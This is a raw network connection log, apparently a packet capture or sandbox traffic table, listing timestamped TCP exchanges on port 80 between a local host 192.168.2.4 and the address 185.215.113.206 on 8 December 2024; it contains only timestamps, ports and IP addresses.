Dec 8, 2024 19:52:30.631151915 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.631814003 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.631860018 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.631921053 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.631963015 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.632771969 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.632817030 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.632843971 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.632884979 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.633414030 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.633460045 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.633555889 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.633598089 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.634268045 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.634335041 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.634408951 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.634450912 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.635081053 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.635126114 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.635175943 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.635214090 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.635880947 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.635926008 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.635996103 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.636035919 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.636753082 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.636799097 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.636806965 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.636857033 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.637691975 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.637737989 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.637851000 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.637908936 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.638379097 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.638422966 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.638464928 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.638506889 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.639115095 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.639142036 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.639156103 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.639172077 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.639990091 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.640034914 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.640073061 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.640113115 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.640830040 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.640877008 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.640882015 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.640921116 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.787722111 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.908531904 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.225620031 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.225708961 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.225809097 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.225809097 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.226030111 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.226072073 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.226149082 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.226187944 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.226959944 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.227035999 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.227103949 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.227144003 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.227746010 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.227804899 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.227906942 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.227952957 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.228451014 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.228502035 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.228542089 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.228590965 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.229240894 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.229285002 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.229356050 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.229401112 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.350205898 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.350245953 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.350295067 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.350317001 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.350563049 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.350614071 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.350666046 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.350711107 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.351337910 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.351392984 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.351450920 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.351499081 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.352116108 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.352166891 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.352197886 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.352245092 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.352943897 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.352989912 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.353004932 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.353039980 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.353643894 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.353689909 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.353735924 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.353776932 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.354409933 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.354456902 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.354501963 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.354546070 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.355267048 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.355317116 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.355350018 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.355387926 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.356302977 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.356354952 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.356367111 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.356395960 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.356924057 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.356969118 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.357053041 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.357095957 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.357769966 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.357815027 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.416636944 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.416671991 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.416737080 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.416770935 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.475182056 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.475248098 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.475377083 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.475528002 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.475581884 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.475716114 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.475759983 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.476356030 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.476397991 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.476561069 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.476603031 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.477170944 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.477216005 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.477273941 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.477313995 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.477958918 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.477994919 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.478014946 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.478029013 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.478761911 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.478813887 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.478984118 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.479027987 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.479574919 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.479620934 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.479656935 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.479701996 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.480422974 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.480472088 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.480504036 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.480545044 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.481182098 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.481225967 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.481244087 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.481298923 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.482052088 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.482100010 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.482126951 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.482163906 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.482829094 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.482872963 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.482899904 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.482942104 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.483643055 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.483692884 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.483774900 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.483822107 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.484492064 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.484536886 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.484550953 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.484586954 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.485330105 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.485375881 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.485407114 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.485443115 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.486254930 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.486299992 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.486382008 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.486424923 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.486898899 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.486943960 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.486974001 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.487014055 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.487725973 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.487768888 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.487817049 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.487857103 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.488523960 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.488573074 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.488660097 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.488727093 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.489346027 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.489391088 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.489453077 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.489496946 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.490148067 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.490197897 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.490238905 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.490277052 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.491231918 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.491277933 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.491281986 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.491318941 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.491930008 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.491971970 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.492005110 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.492049932 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.492594004 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.492639065 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.601006031 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.601046085 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.601083994 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.601108074 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.601286888 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.601326942 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.601363897 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.601401091 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.602257967 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.602309942 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.602395058 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.602440119 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.603179932 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.603228092 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.603281021 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.603327036 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.603790998 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.603837013 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.603957891 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.604006052 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.604545116 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.604578972 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.604592085 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.604615927 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.605345011 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.605407000 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.605485916 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.605530977 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.606184959 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.606204987 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.606254101 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.606270075 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.606987953 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.607037067 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.607111931 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.607157946 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.607795000 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.607814074 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.607851028 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.607851028 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.608659029 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.608715057 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.608813047 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.608865023 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.609510899 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.609559059 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.609563112 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.609599113 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.610215902 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.610270023 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.610322952 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.610375881 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.611084938 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.611125946 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.611136913 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.611171007 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.611973047 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.612035036 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.612061977 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.612112999 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.612819910 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.612886906 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.612947941 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.612987995 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.613629103 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.613681078 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.613713026 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.613758087 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.614464045 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.614522934 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.614556074 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.614604950 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.615216970 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.615262985 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.615370989 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.615420103 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.615992069 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.616045952 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.616166115 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.616286039 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.616890907 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.616950035 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.616976976 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.617014885 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.617640972 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.617696047 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.617749929 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.617801905 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.618505955 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.618570089 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.618583918 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.618623018 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.619250059 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.619311094 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.619329929 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.619390965 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.620023012 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.620075941 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.620091915 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.620147943 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.620918989 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.620969057 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.621026993 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.621071100 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.621638060 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.621690989 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.621829033 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.621891022 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.622560978 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.622608900 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.622689009 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.622730017 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.623374939 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.623440981 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.623500109 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.623538017 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.624799013 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.624844074 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.624972105 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.625025034 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.625117064 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.625128984 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.625174046 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.625174046 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.625766039 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.625823021 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.625902891 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.625952959 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.626657963 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.626708031 CET	80	49748	185.215.113.206	192.168.2.4
